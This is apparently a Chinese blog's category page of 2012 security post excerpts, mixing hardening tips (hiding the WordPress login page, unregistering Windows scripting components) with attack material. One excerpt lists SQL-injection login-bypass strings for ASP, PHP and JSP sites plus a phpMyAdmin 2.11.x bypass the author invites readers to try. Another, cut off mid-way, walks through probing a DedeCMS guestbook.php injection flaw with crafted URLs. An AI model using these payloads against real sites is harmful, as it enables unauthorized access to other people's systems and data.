当前目录: 网络安全
解决 腾讯电脑管家提醒和安全联盟提醒的安全问题

2012年12月27日  seo文章,网络安全   

有时候我们用百度搜索网站的时候会发现这样的提示: [code]腾讯电脑管家提醒您:该网站可能存在安全风险,请谨慎访问! [/code]   [code]安全联盟提醒您:该网站存在安全风险,请谨慎访问!   [/code] 现在分析为什么会出现这样的情况: 1,网站确实中毒被挂木马后者其他的恶意软件。(其实本人觉得这种情况很低) 2,网站存在违法的内容,例如是钓鱼网站,赌博违法之类的字词这类型的网站不仅是百度不给国家也不给。 3,被其他人恶意举报这点我觉得可能性是最高的,应该不算是恶意应该说是被同行人举报才准确,如果网站涉及到了版权方面的问题或者是攻击性的内容也会出现安全提醒,其实我想说的是在国内做网站搞流量生财不可能不去涉及这问题的被同行人举报是正常的。   我相信很多站长也会遇到这样的...

修改WordPress后台 自定义后台登入地址

2012年12月23日  wordpress教程,前端资源,网络安全   

“出来混迟早要还”在网上也难免不了被黑客盯上修改默认的后台路径是必要的网上找了很多这类似的方法修改起来很麻烦,这也不说了问题是没效果,现在介绍大家自定义WordPress后台登入地址的方法。 1,打开wp-login.php这个文件,找到<!DOCTYPE html>,在其上面插入下面的代码: 2, [code]<?php if($_GET["zhe"]!="li"){ header('Location: https://www.xgllseo.com/'); } echo '<h1 style="text-align:center;margin-top:30px;">这里是如假包换的后台!</h1>'; ?>[/code] 3,做完这些步骤之后,你的后台只能通过 https://www.xgllseo.com/wp-login.php?zhe=li 来访问如果直接输入https://www.xgllseo.com/wp-admin/就自动跳转到首页。

服务器安全配置之Wscript.shell利弊

2012年12月16日  网络安全   

Wscrip.shell是Windows自带的组件.因为它过于强大。所以经常被黑客加以利用。它可以调用系统内核运行的DOS墓本命令,与此对应的还有三个危险组件.它们分别是:FSO,Shall.Application, WScript.Network.这几个组件的存在与否直接关系到黑客是否能 成功攻陷你的服务器。所以,在不需要这些组件的情况下.我们应该尽最避免这些组件的存在。Wscrpp.shell可以通过在运行里输入: regsvr32/。c:\winnt\system32\wshom.ocx命令来卸载, 而 Shell.application组件可以通过在运行里输入: regsvr32 /u c:\winnt\system32\shell32.dll命今来卸载。

万能密码汇总

2012年12月16日  网络安全   

asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:   1 or '1'='1'=1 12:   1 or '1'='1' or 1=1 13:   'OR 1=1%00 14:   "or 1=1%00 15: 'xor 16:   用户名   ' UNION Select 1,1,1 FROM admin Where ''='     (替换表名admin)   密码 1 PHP万能密码 'or 1=1/* jsp 万能密码 1'or'1'='1 phpmyadmin 2.11.4万能密码漏洞 phpmyadmin 2.11.4 phpmyadmin 2.11.3 两个版本都有此漏洞 我去测试了一下 确实可以用。。。 你们可以试一下 只需要输入账号  密码不需要输入 利用代码如下: ‘localhost’@'@”

dedecms 最新sql注射漏洞利用guestbook.php

2012年12月12日  网络安全   

漏洞成功需要条件: 1. php magic_quotes_gpc=off 2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。 怎么判断是否存在漏洞: 先打开www.xxx.com/plus/guestbook.php  可以看到别人的留言, 然后鼠标放在 [回复/编辑]   上 可以看到别人留言的ID。那么记下ID 访问: 1 www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID 提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了 跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证 明漏洞无法利用应为他开启了 php magic_quotes_gpc=off 如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。 那么再次...